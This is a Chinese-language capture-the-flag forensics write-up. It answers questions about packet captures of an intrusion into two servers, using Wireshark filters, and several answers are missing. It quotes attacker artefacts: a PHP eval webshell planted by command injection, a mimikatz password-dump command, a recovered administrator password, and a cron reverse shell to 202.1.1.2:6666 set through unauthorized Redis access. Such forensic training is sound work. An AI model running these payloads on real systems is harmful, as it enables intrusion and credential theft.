链接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密码: v6wu
解压密码t3sec.org.cn
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列) 2.两台服务器的主机名分别是什么 3.黑客使用了什么工具对服务器1进行的攻击(小写) 4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode) 5.黑客向服务器1写入webshell的具体命令是什么(url解码后) 6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔) 7.服务器1安装的修补程序名称 8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠) 9.黑客使用什么命令或文件进行的内网扫描 10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开) 11.黑客执行的什么命令将administrator的密码保存到文件中 12.服务器1的系统管理员administrator的密码是什么 13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx) 14.服务器1的mysql的root用户的密码是什么 15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径 16.服务器2的web网站后台账号密码(格式:账号/密码) 17.黑客在redis未授权访问中反弹shell的ip和端口是多少 18.黑客拿到root权限后执行的第二条命令是什么 19.服务器2的root用户密码是什么 20.黑客向服务器2写入webshell的命令 21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)
数据包1
http
攻击者ip 202.1.1.2 服务器1ip 192.168.1.74 服务器2ip 见下面分析
2.两台服务器的主机名分别是什么
找phpinfo
http contains "phpinfo"
数据包二中找到
将返回的phpinfo源码复制到新建的html中,保存后打开
可以看到服务器1的主机名 TEST-7E28AF8836
在后续的数据包中继续过滤
ip.addr == 192.168.2.66 && http contains "phpinfo"
3.黑客使用了什么工具对服务器1进行的攻击(小写)
sqlmap
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
ip.addr == 192.168.1.74 && ip.addr ==202.1.1.2 &&http
发现数据包1中,一直在跑sqlmap
数据包2中,跑完sqlmap后开始扫目录
扫到后台后,开始登陆,看到下面返回admin后台相关的内容,说明此处提交的user和pwd正确
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
数据包二的最下面发现多了个,abc.php,应该不是网站本身的文件,看到上面通过php命令执行写的shell
http://202.1.1.1/tmpbjhbf.php?cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
查看abc.php的请求包都是b64,所以abc.php菜刀一句话呀
总是b64decode太麻烦,不如看对应的返回包,大致能猜出菜刀做了什么操作
接着数据包3
菜刀上传了scan.php扫内网
tunel.nosoket.php作为内网代理
mimi下的mimikatz.exe用来dump服务器1的密码
可以看到服务器1开放的端口有80 135 445 1025 3306 3389 139
TCP注册端口(小于1024)
所以服务器1允许外连的TCP注册端口为80 135 139 445
这时候需要Google搞明白这几个端口是干啥用的。。
紧接着菜刀执行了systeminfo
返回
服务器1为Windows,修补程序Q147222
scan.php 扫描内网 192.168.1.1~192.168.3.255 扫描端口 21,80,8080,1433,3306,6379
追踪tcp流查看返回
<br/>Scanning IP 192.168.1.1<br/> Port: 80 is open<br/> <br/>Scanning IP 192.168.1.8<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.33<br/> 17Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.74<br/> Port: 80 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.159<br/> Port: 80 is open<br/> Port: 8080 is open<br/> Port: 3306 is open<br/> <br/>Scanning IP 192.168.1.169<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 21 <br/>Scanning IP 192.168.2.1<br/> 15 Port: 80 is open<br/> 21 <br/>Scanning IP 192.168.2.20<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 22 22 <br/>Scanning IP 192.168.2.66<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 17 Port: 6379 is open<br/> 22 22 <br/>Scanning IP 192.168.2.88<br/> 15 Port: 21 is open<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 22 21 <br/>Scanning IP 192.168.3.1<br/> 15 Port: 80 is open<br/> <br/>Scanning IP 192.168.3.6<br/> 15 Port: 80 is open<br/> 17 Port: 3306 is open<br/> 21
7.服务器1安装的修补程序名称 从systeminfo返回可看出
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠) phpinfo 可找到
9.黑客使用什么命令或文件进行的内网扫描 scan.php
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
前面只扫了192.168.1.1-192.168.3.255 说明服务器2就从这个网段之间,并且有端口开放的那几个之间选择。。
数据包四
所以服务器2 ip 192.168.2.66
从上面scan.php返回结果可知,扫描结果中服务器2开放了80 3306 6379
11.黑客执行的什么命令将administrator的密码保存到文件中
返回数据包3,黑客用mimikatz dump下服务器已的密码
说明将administrator的密码保存到文件中 的操作就在这附近
cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]
12.服务器1的系统管理员administrator的密码是什么
从上面mimiditz的log可知administrator的密码为Simplexue123
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx) 192.168.1.1~192.168.3.255
14.服务器1的mysql的root用户的密码是什么
mysql相关信息一般都存在config配置文件中
可以http过滤后查看113060到472649之间的config请求包及respone,或者直接过滤root
http contains "root"
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
数据包5
tcp and !(tcp.port == 80) and !(tcp.port == 443) and !(tcp.stream eq 98) and ip.addr == 202.1.1.2
追踪tcp流
可看到绝对路径/var/www/html/
16.服务器2的web网站后台账号密码(格式:账号/密码)
http contains "admin" ||http contains "pass"
服务器2开启的6379端口应该是redis的,貌似黑客通过redis未授权访问拿到shell然后进行后续操作的。
那么应该过滤tcp.port == 6379
数据包4内没有相关内容
数据包5
* * * * * bash -i >& /dev/tcp/202.1.1.2/6666 0>&1
so黑客在redis未授权访问中反弹shell的ip和端口是202.1.1.2和6666
18.黑客拿到权限后执行的第二条命令是什么
cd /var/www/html
19.服务器2的root用户密码是什么
20.黑客向服务器2写入webshell的命令
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
无偿arp包,可以发现isgratuitous必须为true。利用规则arp.isgratuitous == true可以找到数据包。。。
不过,我还是没找到。。。